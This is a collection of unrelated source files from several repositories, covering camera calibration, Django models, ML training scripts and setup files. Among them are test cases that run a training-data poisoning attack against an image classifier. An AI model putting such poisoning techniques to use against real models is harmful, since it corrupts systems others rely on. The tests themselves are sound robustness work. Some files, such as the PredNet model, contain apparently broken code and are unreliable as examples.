np.array([np.eye(2)]*nPt) / 1 for imSel in range(nIm): print('\t imagen', imSel) fkV = intrCalib['inMean'] cameraMatrix, distCoeffs = flat2int(fkV, Ns, model) rtV = intrCalib['exMean'][imSel] imgPts = imagePoints[imSel, 0] Cintr = intrCalib['inCov'] / 1 covLim0 = 6 * imSel covLim1 = covLim0 + 6 Crt = intrCalib['exCov'][covLim0:covLim1,covLim0:covLim1] / 1 retAll = analyticVsMC(imgPts, Ci, cameraMatrix, distCoeffs, Cintr, rtV, Crt) ptsTeo, ptsNum, covTeo, covNum, ptsMC = retAll [xd, yd], [xh, yh], [xm, ym] = ptsTeo Ci, Cd, Ch, Cm = covTeo xI, xD, yD, xH, yH, xM, yM = ptsMC muI, muD, muH, muM = ptsNum CiNum, CdNum, ChNum, CmNum = covNum L.append(sacoValsAng(covTeo[3])) LN.append(sacoValsAng(covNum[3])) Rads.append(ln.norm(imagePoints, axis=1)) # %% for i in range(len(L)): for j in range(3): plt.subplot(2,3,j+1) plt.scatter(L[i][:,j], LN[i][:,j]) plt.subplot(2,3,j+4) plt.scatter(Rads[i], L[i][:,j]) plt.scatter(Rads[i], LN[i][:,j]) for j in range(2): plt.subplot(2,3,j+1) plt.plot([0, 0.5], [0, 0.5], 'k-') plt.subplot(2,3,3) plt.plot([-1, 1], [-1, 1], 'k-') # %% from scipy.special import chdtri def ptosAdentro(x, y, muX, muY, C, p): ''' calcular la cantidad de puntos que caen adentro para una dada probablidad ''' # calculo ma raiz cuadrada de C. tal que A.dot(A.T) = C l, v = ln.eig(ln.inv(C)) A = np.sqrt(l.real) * v # llevo los vectores a la forma linealizada X = np.array([x - muX, y - muY]).T.dot(A) # radio^2 para 2D y probabiliad p de que esten adentro r2 = chdtri(2, 1 - p) adentro = np.sum(ln.norm(X, axis=1) <= np.sqrt(r2)) / x.shape[0] return adentro i = 9 ptosAdentro(xI[:, i, 0], xI[:, i, 1], imagePoints[i, 0], imagePoints[i, 1], Ci[i], 0.7) # x, y, muX, muY, C, p = (xI[:, 9, 0], xI[:, 9, 1], imagePoints[9, 0], imagePoints[9, 1], Ci[0], 0.7) ptosAdentro(xM[:, i], yM[:, i], xm[i], ym[i], Cm[i], 0.7) # %% saco la norma de frobenius de todas y comparo N = 1000 # cantidad de realizaciones imSel = 30 # ELIJO UNA DE LAS IMAGENES covSuperList = list() for imSel in range(0, 33, 4): print(imSel) rtV = intrCalib['exMean'][imSel] imgPts = imagePoints[imSel,0] covLim0 = 6 * imSel covLim1 = covLim0 + 6 Crt = intrCalib['exCov'][covLim0:covLim1,covLim0:covLim1] Dextr = cl.unit2CovTransf(Crt) npts = imgPts.shape[0] retAll = analyticVsMC(imgPts, Ci, cameraMatrix, Cf, distCoeffs, Ck, Cfk, rtV, Crt, retPts=False) # covTeo, covNum = retAll # Ci, Cd, Ch, Cm = covTeo # CiNum, CdNum, ChNum, CmNum = covNum covSuperList.append(retAll) ''' los indices de la supermatriz: (a,b,c,d,e) a: imagen seleccionada b: 0 para teorico, 1 par anumerico c: imagen, disotrted, homogeneus, world d: los puntos en una imagen e, f: son los 2 indices de la covarianza ''' covsTeo, covsNum = np.array(covSuperList).transpose((1, 2, 0, 3, 4, 5)).reshape((2, 4, -1, 2, 2)) scaleNum = np.linalg.inv(covsNum) # saco la norma de frobenius de cada matriz covSuperFrob = np.linalg.norm(covSuperList, axis=(4, 5)) # %% p = 2 matt = np.eye(p) np.exp(-p/2) / spe.gamma(N/2) / 2**(N*p/2) / np.linalg.det(matt)**(p/2+0.5) sts.wishart.pdf(matt, df=N-1, scale=matt) # %% rv = sts.wishart() rv.pdf() frobQuotList = (covSuperFrob[:, 0] / covSuperFrob[:,1]).transpose((1, 0, 2)).reshape((4, -1)) plt.plot(frobQuotList) plt.hist(frobQuotList[3]) plt.violinplot(frobQuotList.T, showmeans=True, showextrema=False) setup.py from setuptools import setup, find_packages import sys, os version = '1.2.0' setup( name='ckanext-scheming', version=version, description="Easy, sharable custom CKAN schemas", long_description=""" This CKAN extension provides a way to configure and share metadata schemas using a YAML or JSON schema description. Custom validation and template snippets for editing and display are supported. Originally developed for the Government of Canada's custom metadata schema, part of https://github.com/open-data/ckanext-canada """, classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers keywords='', author='', author_email='', url='https://github.com/ckan/ckanext-scheming', license='MIT', packages=find_packages(exclude=['ez_setup', 'examples', 'tests']), namespace_packages=['ckanext'], include_package_data=True, zip_safe=False, install_requires=[], entry_points=\ """ [ckan.plugins] scheming_datasets=ckanext.scheming.plugins:SchemingDatasetsPlugin scheming_groups=ckanext.scheming.plugins:SchemingGroupsPlugin scheming_organizations=ckanext.scheming.plugins:SchemingOrganizationsPlugin scheming_test_subclass=ckanext.scheming.tests.plugins:SchemingTestSubclass scheming_test_plugin=ckanext.scheming.tests.plugins:SchemingTestSchemaPlugin itranslation=ckanext.itranslation.plugin:ExampleITranslationPlugin [babel.extractors] ckan = ckan.lib.extract:extract_ckan [paste.paster_command] scheming=ckanext.scheming.commands:SchemingCommand """, message_extractors={ 'ckanext': [ ('**.py', 'python', None), ('**.js', 'javascript', None), ('**/templates/**.html', 'ckan', None), ], } ) 1-10 # MIT License # # Copyright (C) The Adversarial Robustness Toolbox (ART) Authors 2021 # # Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated # documentation files (the "Software"), to deal in the Software without restriction, including without limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all copies or substantial portions of the # Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE # WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, # TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. from __future__ import absolute_import, division, print_function, unicode_literals import logging import numpy as np import pytest from art.attacks.poisoning import BullseyePolytopeAttackPyTorch from tests.utils import ARTTestException logger = logging.getLogger(__name__) @pytest.mark.skip_framework("non_dl_frameworks", "tensorflow", "mxnet", "keras", "kerastf") def test_poison(art_warning, get_default_mnist_subset, image_dl_estimator): try: (x_train, y_train), (_, _) = get_default_mnist_subset classifier, _ = image_dl_estimator(functional=True) target = np.expand_dims(x_train[3], 0) attack = BullseyePolytopeAttackPyTorch(classifier, target, len(classifier.layer_names) - 2) poison_data, poison_labels = attack.poison(x_train[5:10], y_train[5:10]) np.testing.assert_equal(poison_data.shape, x_train[5:10].shape) np.testing.assert_equal(poison_labels.shape, y_train[5:10].shape) with pytest.raises(AssertionError): np.testing.assert_equal(poison_data, x_train[5:10]) except ARTTestException as e: art_warning(e) @pytest.mark.skip_framework("non_dl_frameworks", "tensorflow", "mxnet", "keras", "kerastf") def test_poison_multiple_layers(art_warning, get_default_mnist_subset, image_dl_estimator): try: (x_train, y_train), (_, _) = get_default_mnist_subset classifier, _ = image_dl_estimator(functional=True) target = np.expand_dims(x_train[3], 0) num_layers = len(classifier.layer_names) attack = BullseyePolytopeAttackPyTorch(classifier, target, [num_layers - 2, num_layers - 3]) poison_data, poison_labels = attack.poison(x_train[5:10], y_train[5:10]) np.testing.assert_equal(poison_data.shape, x_train[5:10].shape) np.testing.assert_equal(poison_labels.shape, y_train[5:10].shape) with pytest.raises(AssertionError): np.testing.assert_equal(poison_data, x_train[5:10]) except ARTTestException as e: art_warning(e) @pytest.mark.skip_framework("non_dl_frameworks", "tensorflow", "mxnet", "keras", "kerastf") def test_failure_modes(art_warning, get_default_mnist_subset, image_dl_estimator): try: (x_train, y_train), (_, _) = get_default_mnist_subset classifier, _ = image_dl_estimator(functional=True) target = np.expand_dims(x_train[3], 0) with pytest.raises(ValueError): _ = BullseyePolytopeAttackPyTorch(classifier, target, len(classifier.layer_names) - 2, learning_rate=-1) with pytest.raises(ValueError): _ = BullseyePolytopeAttackPyTorch(classifier, target, len(classifier.layer_names) - 2, max_iter=-1) with pytest.raises(TypeError): _ = BullseyePolytopeAttackPyTorch(classifier, target, 2.5) with pytest.raises(ValueError): _ = BullseyePolytopeAttackPyTorch(classifier, target, len(classifier.layer_names) - 2, opt="new optimizer") with pytest.raises(ValueError): _ = BullseyePolytopeAttackPyTorch(classifier, target, len(classifier.layer_names) - 2, momentum=1.2) with pytest.raises(ValueError): _ = BullseyePolytopeAttackPyTorch(classifier, target, len(classifier.layer_names) - 2, decay_iter=-1) with pytest.raises(ValueError): _ = BullseyePolytopeAttackPyTorch(classifier, target, len(classifier.layer_names) - 2, epsilon=-1) with pytest.raises(ValueError): _ = BullseyePolytopeAttackPyTorch(classifier, target, len(classifier.layer_names) - 2, dropout=2) with pytest.raises(ValueError): _ = BullseyePolytopeAttackPyTorch(classifier, target, len(classifier.layer_names) - 2, net_repeat=-1) with pytest.raises(ValueError): _ = BullseyePolytopeAttackPyTorch(classifier, target, -1) with pytest.raises(ValueError): _ = BullseyePolytopeAttackPyTorch(classifier, target, len(classifier.layer_names) - 2, decay_coeff=2) except ARTTestException as e: art_warning(e) apps/courses/models.py import datetime from django.db import models from django.conf import settings from django.contrib.auth.models import Group, User from django.utils.translation import ugettext as _ from djangotoolbox import fields from tinymce import models as tinymce_models import recurrence.fields from libs.utils.fields import ForeignKey class Semester(models.Model): name = models.CharField(max_length = 200) year = models.IntegerField() start = models.DateField() end = models.DateField() def active(self): return self.start < datetime.date.today() and self.end > datetime.date.today() def save(self, *args, **kwargs): if self.start > self.end: raise ValueError, "Start date must be before end date." return super(Semester, self).save(*args, **kwargs) def __unicode__(self): return "%s %s" % (self.name, self.year) class Course(models.Model): title = models.CharField(max_length = 200) section = models.CharField(max_length = 10) number = models.CharField(max_length = 10) description = tinymce_models.HTMLField() semester = models.ForeignKey(Semester) faculty = fields.ListField(ForeignKey(User, related_name = _('Faculty'))) teaching_assistants = fields.ListField(ForeignKey(User, related_name = _('Teaching Assistants'))) private = models.BooleanField(default=False, blank=True) members = fields.ListField(ForeignKey(User, related_name = _('Members'))) schedule = recurrence.fields.RecurrenceField() credits = models.DecimalField(max_digits = 3, decimal_places = 1, default = '3.0') campus = models.CharField(max_length = 200, choices = getattr(settings, 'CAMPUSES', [('main', 'Main'),] ), ) location = models.CharField(max_length = 200) def __unicode__(self): return "%s" % (self.title) class Admin: js = ( 'tiny_mce/tiny_mce.js', '/appmedia/admin/js/textareas.js', ), class Assignment(models.Model): course = models.ForeignKey(Course) title = models.CharField(max_length = 200) description = tinymce_models.HTMLField() due_date = models.DateField(null = True) def __unicode__(self): return unicode(self.title) class AssignmentSubmission(models.Model): users = fields.ListField(ForeignKey(User, related_name = 'submitters')) assignment = models.ForeignKey(Assignment) link = models.URLField(blank = True) file = models.FileField(upload_to = 'photos/%Y/%m/%d', blank = True) notes = models.TextField(blank = True) submitted = models.DateTimeField(auto_now_add = True) modified = models.DateTimeField(auto_now_add = True, auto_now = True) def __unicode__(self): if self.link: return self.link elif self.file: return self.file.name class Resource(models.Model): course = models.ForeignKey(Course) title = models.CharField(max_length = 200) description = tinymce_models.HTMLField() link = models.URLField(blank = True) file = models.FileField(upload_to = 'photos/%Y/%m/%d', blank = True) def __unicode__(self): return self.title NVIDIA-Merlin/systems0 # # Copyright (c) 2022, NVIDIA CORPORATION. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import pathlib from typing import List from merlin.dag import ColumnSelector from merlin.schema import Schema from merlin.systems.dag.ops.operator import InferenceOperator from merlin.systems.triton.export import _generate_nvtabular_config class TransformWorkflow(InferenceOperator): """ This operator takes a workflow and turns it into a ensemble operator so that we can execute feature engineering during ensemble on tritonserver. """ def __init__( self, workflow, sparse_max: dict = None, max_batch_size: int = None, label_columns: List[str] = None, model_framework: str = None, cats: List[str] = None, conts: List[str] = None, ): """ Creates a Transform Workflow operator for a target workflow. Parameters ---------- workflow : Nvtabular.Workflow The workflow to transform data in ensemble. sparse_max : dict, optional Dictionary representing key(name)/val(max value) pairs of max sparsity, by default None max_batch_size : int, optional Maximum batch size, by default None label_columns : List[str], optional List of strings identifying the label columns, by default None model_framework : str, optional String representing the target framework (supported: hugectr, tensorflow, pytorch, python), by default None cats : List[str], optional List of strings identifying categorical columns, by default None conts : List[str], optional List of string identifying continuous columns, by default None """ super().__init__() self.workflow = workflow self.sparse_max = sparse_max or {} self.max_batch_size = max_batch_size self.label_columns = label_columns or [] self.model_framework = model_framework or "" self.cats = cats or [] self.conts = conts or [] super().__init__() def compute_output_schema( self, input_schema: Schema, col_selector: ColumnSelector, prev_output_schema: Schema = None ) -> Schema: return self.workflow.output_schema def export(self, path, input_schema, output_schema, node_id=None, version=1): """Create a directory inside supplied path based on our export name""" modified_workflow = self.workflow.remove_inputs(self.label_columns) node_name = f"{node_id}_{self.export_name}" if node_id is not None else self.export_name node_export_path = pathlib.Path(path) / node_name node_export_path.mkdir(parents=True, exist_ok=True) workflow_export_path = node_export_path / str(version) / "workflow" modified_workflow.save(str(workflow_export_path)) return _generate_nvtabular_config( modified_workflow, node_name, node_export_path, backend="nvtabular", sparse_max=self.sparse_max, max_batch_size=self.max_batch_size, cats=self.cats, conts=self.conts, ) Tarpelite/YourLegend from django.urls import path from django.conf.urls import url from . import views app_name = "TextWeb" urlpatterns = [ path('Choice/', views.Choice, name='Choice'), url(r'^$', views.predict_based_time, name='Answer') ]src/utils.py ''' A program to summarize FastQC data. Author: (). Copyright: 2016 See README.md for details about how to use the program. Repository: https://github.com/khalidm/fastqcsum ''' import os import sys def getHtmlHeader(): html_str = """ FastQC Summary

File
Basic Statistics
Per base sequence quality
Per tile sequence quality
Per sequence quality scores
Per base sequence content
Per sequence GC content
Per base N content
Sequence Length Distribution
Sequence Duplication Levels
Overrepresented sequences
Adapter Content
Kmer Content
""" return html_str def getHtmlHeader2(path): html_str = """ FastQC Summary

FastQC summary

""" html_str += """

source directory: """ html_str += path html_str += """

""" html_str += """
File
Basic Statistics
Per base sequence quality
Per tile sequence quality
Per sequence quality scores
Per base sequence content
Per sequence GC content
Per base N content
Sequence Length Distribution
Sequence Duplication Levels
Overrepresented sequences
Adapter Content
Kmer Content
""" return html_str def getImageName(module): '''Build a string to match module name and image file name''' im = "" im_ex = False if module == "Basic Statistics": im_ex = False im = "" elif module == "Per base sequence quality": im = "per_base_quality.png" im_ex = True elif module == "Per tile sequence quality": im = "per_tile_quality.png" im_ex = True elif module == "Per sequence quality scores": im = "per_sequence_quality.png" im_ex = True elif module == "Per base sequence content": im = "per_base_sequence_content.png" im_ex = True elif module == "Per sequence GC content": im = "per_sequence_gc_content.png" im_ex = True elif module == "Per base N content": im = "per_base_n_content.png" im_ex = True elif module == "Sequence Length Distribution": im = "sequence_length_distribution.png" im_ex = True elif module == "Sequence Duplication Levels": im = "duplication_levels.png" im_ex = True elif module == "Overrepresented sequences": im = "" im_ex = False elif module == "Adapter Content": im = "adapter_content.png" im_ex = True elif module == "Kmer Content": im = "kmer_profiles.png" im_ex = True else: im = "" im_ex = False return im, im_ex def fibMemo(): pad = {0:0, 1:1} def func(n): if n not in pad: pad[n] = func(n-1) + func(n-2) return pad[n] return func fm = fibMemo() for i in range(1,31): print(fm(i), end=' ') setup.py from setuptools import setup, find_packages setup( name='gym_d2d', version='0.0.3', description='Device-to-Device (D2D) communication OpenAI Gym environment', keywords='open ai gym environment rl agent d2d cellular offload resource allocation', url='https://github.com/davidcotton/gym-d2d', long_description=open('README.md').read(), long_description_content_type='text/markdown', packages=find_packages(where='src'), package_dir={'': 'src'}, install_requires=['gym>=0.9.6', 'numpy'], extras_require={ 'dev': ['flake8', 'pytest', 'pytest-cov', 'pytest-sugar'] }, clasifiers=[ 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'License :: OSI Approved :: MIT License', 'Operating System :: OS Independent', ], ) import click import spacy language_model = "en_core_web_trf" nlp = spacy.load(language_model) def find_root_of_sentence(doc): root_token = None for token in doc: if token.dep_ == "ROOT": root_token = token return root_token def find_other_verbs(doc, root_token): other_verbs = [] for token in doc: ancestors = list(token.ancestors) if token.pos_ == "VERB" and len(ancestors) == 1 and ancestors[0] == root_token: other_verbs.append(token) return other_verbs def get_clause_token_span_for_verb(verb, doc, all_verbs): first_token_index = len(doc) last_token_index = 0 this_verb_children = list(verb.children) for child in this_verb_children: if child not in all_verbs: if child.i < first_token_index: first_token_index = child.i if child.i > last_token_index: last_token_index = child.i return first_token_index, last_token_index @click.command() @click.option('--text', help='Input sentence') def click_find_main_clause(text): ret_val = find_main_clause(text) print(ret_val) def find_main_clause(text): doc = nlp(text) root_token = find_root_of_sentence(doc) other_verbs = find_other_verbs(doc, root_token) token_spans = [] all_verbs = [root_token] + other_verbs for other_verb in all_verbs: (first_token_index, last_token_index) = \ get_clause_token_span_for_verb(other_verb, doc, all_verbs) token_spans.append((first_token_index, last_token_index)) sentence_clauses = [] for token_span in token_spans: start = token_span[0] end = token_span[1] if start < end: clause = doc[start:end] sentence_clauses.append(clause) sentence_clauses = sorted(sentence_clauses, key=lambda tup: tup[0]) clauses_text = [clause.text for clause in sentence_clauses] return clauses_text[0] if __name__ == '__main__': click_find_main_clause() yumaloop/predwm0 import os import tensorflow as tf import tensorflow.contrib.layers as ly import numpy as np seed = 42 np.random.seed(seed) tf.set_random_seed(seed) def add_upscale(X): prev_shape = X.get_shape() size = [2 * int(s) for s in prev_shape[1:3]] return tf.image.resize_nearest_neighbor(X, size) class PredNet(): def __init__(self, batch_size, time_step, layer_loss_weights=np.array([1., 0, 0, 0], np.float32) , img_shape=(128, 160, 3), stack_sizes=(3, 48, 96, 192), R_stack_sizes=(3, 48, 96, 192), A_filter_sizes=(3, 3 ,3), Ahat_filter_sizes=(3, 3, 3, 3), R_filter_sizes=(3, 3, 3, 3), pixel_max=1, output_mode='all', extrap_start_time=None): self.batch_size = batch_size self.time_step = time_step self.layer_loss_weights = layer_loss_weights self.img_shape = img_shape self.stack_sizes = stack_sizes self.nb_layers = len(stack_sizes) self.R_stack_sizes = R_stack_sizes self.A_filter_sizes = A_filter_sizes self.Ahat_filter_sizes = Ahat_filter_sizes self.R_filter_sizes = R_filter_sizes self.pixel_max = pixel_max self.output_mode = output_mode default_output_mode = ['predition', 'error', 'all'] layer_output_mode = [layer + str(n) for n in range(self.nb_layers) for layer in ['R', 'E', 'A', 'Ahat']] if self.output_mode in default_output_mode: self.output_layer_type = self.output_mode[:-1] self.output_layer_num = int(self.output_mode[-1]) else: self.output_layer_type = None self.output_layer_num = None img_w, img_h, img_c = self.img_shape self.frame_shape = [self.batch_size, 1, img_h, img_w, img_c] self.error_shape = [self.batch_size, 1, self.nb_layers] self.input_shape = [self.batch_size, self.time_step, img_h, img_w, img_c] self.build_model() def build_model(self, hps): self.inputs = tf.placeholder(tf.float32, self.input_shape) frame_predictions, errors = self.forward(self.inputs) errors = tf.concat(axis=1, values=errors) # [b, t, nb_layers] self.frame_predictions = tf.concat(axis=1, values=frame_predictions) # [b, t, h, w, c] layer_loss_weights = np.expand_dims(self.layer_loss_weights, 1) time_loss_weights = 1. / (self.time_step - 1) * np.ones((self.time_step, 1)) time_loss_weights[0] = 0 time_loss_weights = np.array(time_loss_weights, np.float32) errors_ = tf.reshape(errors, [-1, self.nb_layers]) errors_by_time = tf.matmul(errors_, layer_loss_weights) # [b * t, 1] errors_by_time = tf.reshape(errors_by_time, (self.batch_size, self.time_step)) errors_by_time = errors[:, :, 0] final_error = flatten(tf.matmul(errors_by_time, time_loss_weights)) # [b] final_error = tf.reduce_mean(final_error) # training operation self.error = final_error self.loss_sum = tf.summary.scalar("error", self.error) self.t_vars = tf.trainable_variables() num_param = 0.0 for var in self.t_vars: num_param += int(np.prod(var.get_shape())) print("Number of paramers: %d"%num_param) self.saver = tf.train.Saver(max_to_keep = 10) def forward(self, inputs): """ inputs : [batch_size, t, h, w, c] batch_size : batch datasize t : time step (frame) h : image height size w : image width size c : image channel size """ states = self.get_initial_state() errors = [] frame_predictions = [] t = inputs.get_shape().as_list()[1] reuse_step = False for ti in range(t): a = inputs[:, ti] output, states = self.step(a, states, reuse_step=reuse_step) frame_predictions.append(tf.reshape(output[0], self.frame_shape)) errors.append(tf.reshape(output[1], self.error_shape)) reuse_step = True return frame_predictions, errors def get_initial_state(self): initial_states = [] img_h, img_w, img_c = self.img_shape for u in ["r", "c", "e"]: for l in range(self.nb_layers): if u in ['r', 'c']: stack_size = self.R_stack_sizes[l] elif u == 'e': stack_size = 2 * self.stack_sizes[l] output_size = stack_size * img_h * img_w initial_state = tf.zeros((batch, output_size)) output_shape = (self.batch_size, img_h, img_w, stack_size) initial_state = tf.reshape(initial_state, output_shape) initial_states += [initial_state] return initial_states def step(self, a, states, reuse_step, scope_step='one_step'): r_tm1 = states[: self.nb_layers] c_tm1 = states[self.nb_layers: 2 * self.nb_layers] e_tm1 = states[2 * self.nb_layers: 3 * self.nb_layers] r = [] c = [] e = [] with tf.variable_scope(scope_step) as scope: if reuse_step: scope.reuse_variables() for l in reversed(range(self.nb_layers)): inputs = [r_tm1[l], e_tm1[l]] if l < self.nb_layers - 1: inputs.append(r_up) inputs = tf.concat(inputs, axis=-1) new_c, new_r = self.convlstm(inputs, l, c_tm1[l], 'lstm' + str(l)) c.insert(0, new_c) r.insert(0, new_r) if l > 0: r_up = add_upscale(new_r) for l in range(self.nb_layers): # Ahat with tf.variable_scope("conv_ahat"+str(l)): input_ = r[l] k_h = 3 k_w = 3 in_ch = input_.get_shape()[-1] out_ch = self.stack_sizes[l] w = tf.get_variable("weights", [k_h, k_w, in_ch, out_ch], initializer=tf.contrib.layers.xavier_initializer(seed=seed)) b = tf.get_variable('biases', [out_ch], initializer=tf.constant_initializer(0.0)) conv = tf.nn.conv2d(input_, w, strides=[1, 1, 1, 1], padding='SAME') conv = tf.nn.bias_add(conv, b) ahat = tf.nn.relu(conv) if l == 0: ahat = tf.minimum(ahat, self.pixel_max) frame_prediction = ahat e_up = tf.nn.relu(ahat - a) e_down = tf.nn.relu(a - ahat) e.append(tf.concat([e_up, e_down], axis=-1)) if self.output_layer_num == l: if self.output_layer_type == 'A': output = a elif self.output_layer_type == 'Ahat': output = ahat elif self.output_layer_type == 'r': output = r[l] elif self.output_layer_type == 'e': output = e[l] if l < self.nb_layers - 1: # A with tf.variable_scope("conv_a"+str(l)): input_ = e[l] k_h = 3 k_w = 3 in_ch = input_.get_shape()[-1] out_ch = self.stack_sizes[l+1] w = tf.get_variable("weights", [k_h, k_w, in_ch, out_ch], initializer=tf.contrib.layers.xavier_initializer(seed=seed)) b = tf.get_variable("biases", [out_ch], initializer=tf.constant_initializer(0.0)) conv = tf.nn.conv2d(input_, w, strides=[1, 1, 1, 1], padding='SAME') conv = tf.nn.bias_add(conv, b) a = tf.nn.relu(conv) a = tf.nn.max_pool(a, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') if self.output_layer_type is None: if self.output_mode == 'prediction': output = frame_prediction else: for l in range(self.nb_layers): layer_error = tf.reduce_mean(flatten(e[l]), axis=-1, keep_dims=True) if l == 0: all_error = layer_error else: all_error = tf.concat([all_error, layer_error], axis=-1) if self.output_mode == 'error': output = all_error else: output = [frame_prediction, all_error] states = r + c + e return output, states def convlstm(self, inputs, li, c, scope_name="conv_lstm", reuse=False): with tf.variable_scope(scope_name) as scope: if reuse: scope.reuse_variables() concat = conv2d(inputs, self.R_stack_sizes[li] * 4, self.R_filter_sizes[li], self.R_filter_sizes[li], name='lstm'+str(l)) i, z, f, o = tf.split(axis=3, num_or_size_splits=4, value=concat) new_c = c * tf.nn.sigmoid(f) + tf.nn.sigmoid(i) * tf.nn.tanh(z) new_h = tf.nn.tanh(new_c) * tf.nn.sigmoid(o) return new_c, new_h def save(self, sess, checkpoint_dir, step): model_name = "PredNet" if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) self.saver.save(sess, os.path.join(checkpoint_dir, model_name), global_step=step) def load(self, sess, checkpoint_dir, model_name=None): print(" [*] Reading checkpoints...") ckpt = tf.train.get_checkpoint_state(checkpoint_dir) if ckpt and ckpt.model_checkpoint_path: ckpt_name = os.path.basename(ckpt.model_checkpoint_path) if model_name is None: model_name = ckpt_name self.saver.restore(sess, os.path.join(checkpoint_dir, model_name)) print(" Loaded model: "+str(model_name)) return True, model_name else: return False, None #/usr/bin/python3 #-*- encoding=utf-8 -*- import argparse import numpy as np from pathlib import Path from keras.callbacks import LearningRateScheduler, ModelCheckpoint from keras.optimizers import Adam from model import get_model, PSNR, L0Loss, UpdateAnnealingParameter from generator import NoisyImageGenerator, ValGenerator class Schedule: def __init__(self, nb_epochs, initial_lr): self.epochs = nb_epochs self.initial_lr = initial_lr def __call__(self, epoch_idx): if epoch_idx < self.epochs * 0.25: return self.initial_lr elif epoch_idx < self.epochs * 0.50: return self.initial_lr * 0.5 elif epoch_idx < self.epochs * 0.75: return self.initial_lr * 0.25 return self.initial_lr * 0.125 def get_args(): parser = argparse.ArgumentParser(description="train noise2noise model", formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument("--image_dir_1", type=str, default='/data_1/noise2noise-master/chejian_img/291_in.txt', help="train image dir") parser.add_argument("--image_dir_2", type=str, default='/data_1/noise2noise-master/chejian_img/291_out.txt', help="train image dir") parser.add_argument("--test_dir_1", type=str,default='/data_1/noise2noise-master/chejian_img/291_in.txt', help="test image dir") parser.add_argument("--test_dir_2", type=str,default='/data_1/noise2noise-master/chejian_img/291_out.txt', help="test image dir") parser.add_argument("--image_size", type=int, default=128, help="training patch size") parser.add_argument("--batch_size", type=int, default=8, help="batch size") parser.add_argument("--nb_epochs", type=int, default=60, help="number of epochs") parser.add_argument("--lr", type=float, default=0.001, help="learning rate") parser.add_argument("--steps", type=int, default=1000, help="steps per epoch") parser.add_argument("--loss", type=str, default="mae", help="loss; mse', 'mae', or 'l0' is expected") parser.add_argument("--weight", type=str, default='/data_1/noise2noise-master/weights.056-4.172-28.07752_text_clean.hdf5', help="weight file for restart") parser.add_argument("--output_path", type=str, default="model_0415_new", help="checkpoint dir") parser.add_argument("--model", type=str, default="srresnet", help="model architecture ('srresnet' or 'unet')") args = parser.parse_args() return args def main(): args = get_args() source_image_dir = args.image_dir_1 target_image_dir = args.image_dir_2 test_source_dir = args.test_dir_1 test_target_dir = args.test_dir_2 image_size = args.image_size batch_size = args.batch_size nb_epochs = args.nb_epochs lr = args.lr steps = args.steps loss_type = args.loss output_path = Path(__file__).resolve().parent.joinpath(args.output_path) model = get_model(args.model) if args.weight is not None: print("load pre-trained weight: " + args.weight) model.load_weights(args.weight) opt = Adam(lr=lr) callbacks = [] if loss_type == "l0": l0 = L0Loss() callbacks.append(UpdateAnnealingParameter(l0.gamma, nb_epochs, verbose=1)) loss_type = l0() model.compile(optimizer=opt, loss=loss_type, metrics=[PSNR]) #source_noise_model = get_noise_model(args.source_noise_model) #target_noise_model = get_noise_model(args.target_noise_model) #val_noise_model = get_noise_model(args.val_noise_model) print("NoisyImageGenerator start") generator = NoisyImageGenerator(source_image_dir, target_image_dir, batch_size, image_size) print("NoisyImageGenerator end") print("ValGenerator start") val_generator = ValGenerator(test_source_dir, test_target_dir, image_size) print("ValGenerator end") output_path.mkdir(parents=True, exist_ok=True) callbacks.append(LearningRateScheduler(schedule=Schedule(nb_epochs, lr))) callbacks.append(ModelCheckpoint(str(output_path) + "/weights.{epoch:03d}-{val_loss:.3f}-{val_PSNR:.3f}.hdf5", monitor="val_loss", verbose=1, mode="min", save_best_only=False)) print("fit_generator start") hist = model.fit_generator(generator=generator, steps_per_epoch=steps, epochs=nb_epochs, validation_data=val_generator, verbose=1, callbacks=callbacks) print("fit_generator end") np.savez(str(output_path.joinpath("history.npz")), history=hist.history) if __name__ == '__main__': main() """ DESAFIO 029: letrônico Escreva um programa que leia a velocidade de um carro. Se ele ultrapassar 80 km/h, mostre uma mensagem dizendo que ele foi multado. A multa vai custar R$ 7,00 por cada km acima do limite. """ vel = int(input('Qual velocidade o carro está? Digite um número inteiro (ex: 85): ')) multa = 7.00 total = (vel - 80) * multa if vel > 80: print('O carro está a {} Km/h, sendo que a velocidade máxima permitida é 80 Km/h.'.format(vel)) print('Nesse caso, a multa para ele é R$ {:.2f}!'.format(total)) else: print('O carro está a {} Km/h, portanto está dentro da velocidade máxima permitida de 80 Km/h!'.format(vel)) papermerge/test/parts/app_max_p/apps.py from django.apps import AppConfig class AppMaxPConfig(AppConfig): name = 'app_max_p' 1000+ #!/usr/bin/env python """Efficient compression of pkg installers. Use case: store multiple large .pkg with similar and overlapping content in one zip archive. Solution: a .pkg file is a XAR archive. A XAR archive contains: * a binary header * a gzip-compressed XML table of contents * the concatenated archived files The most notable file is named Payload, which is a gzip'ed CPIO archive containing all the files to be installed. CPIO archives files as a sequence of (ASCII header, file name, file contents). References: * https://en.wikipedia.org/wiki/Xar_(archiver) * https://www.mkssoftware.com/docs/man4/cpio.4.asp """ import contextlib import gzip import hashlib import os import platform import shutil import struct import subprocess import typing import xml.dom.minidom import zlib from grr_response_core.lib import 